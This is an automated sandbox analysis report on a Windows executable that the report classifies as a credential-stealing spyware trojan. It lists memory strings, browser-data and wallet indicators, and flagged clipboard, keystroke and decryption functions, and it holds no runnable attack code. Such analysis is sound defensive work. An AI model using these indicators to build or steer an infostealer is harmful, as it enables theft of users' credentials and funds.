Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, FHDAFIID.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1958323593.0000000028862000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, BAEBGCFIEHCFIDGCAAFB.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1958323593.0000000028862000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, BAEBGCFIEHCFIDGCAAFB.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, FHDAFIID.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FHDAFIID.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, FHDAFIID.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BAEBGCFIEHCFIDGCAAFB.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://support.mozilla.org
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000003.1856393470.0000000022779000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000003.1856393470.0000000022779000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17381
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1958323593.0000000028862000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, BAEBGCFIEHCFIDGCAAFB.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: 4c469e2cf403fea6249e835ddce23de2.exe, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: FHDAFIID.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1958323593.0000000028862000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, BAEBGCFIEHCFIDGCAAFB.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: FHDAFIID.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://www.mozilla.org
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000003.1920372324.0000000028988000.00000004.00000020.00020000.00000000.sdmp, EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000003.1920372324.0000000028988000.00000004.00000020.00020000.00000000.sdmp, EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009BE140 OpenClipboard,WideCharToMultiByte,_free,_free,SetLastError,_free,_free,_free,_free, 0_2_009BE140
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009BE0A0 GetClipboardData,GlobalLock,_malloc,GlobalUnlock,CloseClipboard,_free, 0_2_009BE0A0
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009B6150 GetKeyState,SendMessageW,IsRectEmpty,GetClientRect,InvalidateRect,InvalidateRect,InvalidateRect,UpdateWindow,IsRectEmpty,GetAsyncKeyState,SendMessageW, 0_2_009B6150
Detected potential crypto function
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A6A43F 0_2_00A6A43F
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A6AEA2 0_2_00A6AEA2
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B1A010 0_2_00B1A010
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009B6150 0_2_009B6150
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009C6140 0_2_009C6140
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009BA2D0 0_2_009BA2D0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A6A4A8 0_2_00A6A4A8
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009DA590 0_2_009DA590
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A6A6C2 0_2_00A6A6C2
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009CC640 0_2_009CC640
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A4E655 0_2_00A4E655
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009BE760 0_2_009BE760
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A6A8EA 0_2_00A6A8EA
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009B9990 0_2_009B9990
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A6A94F 0_2_00A6A94F
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A6AB9F 0_2_00A6AB9F
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009C7B10 0_2_009C7B10
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009D0D50 0_2_009D0D50
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B1BFDA 0_2_00B1BFDA
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C74AC60 0_2_6C74AC60
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C806C00 0_2_6C806C00
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C79ECD0 0_2_6C79ECD0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C81AC30 0_2_6C81AC30
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C73ECC0 0_2_6C73ECC0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C8CCDC0 0_2_6C8CCDC0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C8C8D20 0_2_6C8C8D20
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C744DB0 0_2_6C744DB0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C86AD50 0_2_6C86AD50
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7D6D90 0_2_6C7D6D90
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C80ED70 0_2_6C80ED70
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7DEE70 0_2_6C7DEE70
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C820E20 0_2_6C820E20
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C74AEC0 0_2_6C74AEC0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7E0EC0 0_2_6C7E0EC0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7C6E90 0_2_6C7C6E90
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C888FB0 0_2_6C888FB0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7AEF40 0_2_6C7AEF40
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C746F10 0_2_6C746F10
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C81EFF0 0_2_6C81EFF0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C740FE0 0_2_6C740FE0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C880F20 0_2_6C880F20
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C74EFB0 0_2_6C74EFB0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C802F70 0_2_6C802F70
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C790820 0_2_6C790820
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7CA820 0_2_6C7CA820
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C8468E0 0_2_6C8468E0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C814840 0_2_6C814840
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C778960 0_2_6C778960
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C8009B0 0_2_6C8009B0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C85C9E0 0_2_6C85C9E0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C796900 0_2_6C796900
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7749F0 0_2_6C7749F0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7D09A0 0_2_6C7D09A0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7FA9A0 0_2_6C7FA9A0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7BCA70 0_2_6C7BCA70
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7F8A30 0_2_6C7F8A30
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7EEA00 0_2_6C7EEA00
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7BEA80 0_2_6C7BEA80
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C846BE0 0_2_6C846BE0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C748BAC 0_2_6C748BAC
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7E0BA0 0_2_6C7E0BA0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C86A480 0_2_6C86A480
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C758460 0_2_6C758460
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7CA430 0_2_6C7CA430
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7A4420 0_2_6C7A4420
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7864D0 0_2_6C7864D0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7DA4D0 0_2_6C7DA4D0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7E0570 0_2_6C7E0570
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7A2560 0_2_6C7A2560
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C798540 0_2_6C798540
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C80A5E0 0_2_6C80A5E0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7CE5F0 0_2_6C7CE5F0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7345B0 0_2_6C7345B0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C844540 0_2_6C844540
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C888550 0_2_6C888550
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C79C650 0_2_6C79C650
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C79E6E0 0_2_6C79E6E0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7DE6E0 0_2_6C7DE6E0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7646D0 0_2_6C7646D0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: String function: 00B1B8D7 appears 96 times
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: String function: 6C8C09D0 appears 126 times
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: String function: 6C769B10 appears 34 times
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: String function: 6C763620 appears 38 times
PE / OLE file has an invalid certificate
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: invalid certificate
PE file contains executable resources (Code or Archives)
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Sample file is different than original file name gathered from version info
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1937567224.000000000146D000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameusbclient.exef# vs 4c469e2cf403fea6249e835ddce23de2.exe
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962400260.000000006C915000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs 4c469e2cf403fea6249e835ddce23de2.exe
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962537959.000000006F8F2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 4c469e2cf403fea6249e835ddce23de2.exe
Source: 4c469e2cf403fea6249e835ddce23de2.exe Binary or memory string: OriginalFilenameusbclient.exef# vs 4c469e2cf403fea6249e835ddce23de2.exe
Uses 32bit PE files
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009D3E30 __snprintf,_memset,GetVersionExW,GetLastError,_memset,FormatMessageW,SendMessageW, 0_2_009D3E30
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009CFEC0 _memset,GetVersionExW,CoInitializeEx,CreateEventW,CreateEventW,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,__beginthreadex,CloseHandle,CoCreateInstance, 0_2_009CFEC0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A6C0D8 LockResource, 0_2_00A6C0D8
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NHEHMOPV.htm Jump to behavior
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000003.1859335907.000000002274E000.00000004.00000020.00020000.00000000.sdmp, KFCBAEHCAEGDHJKFHJKF.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
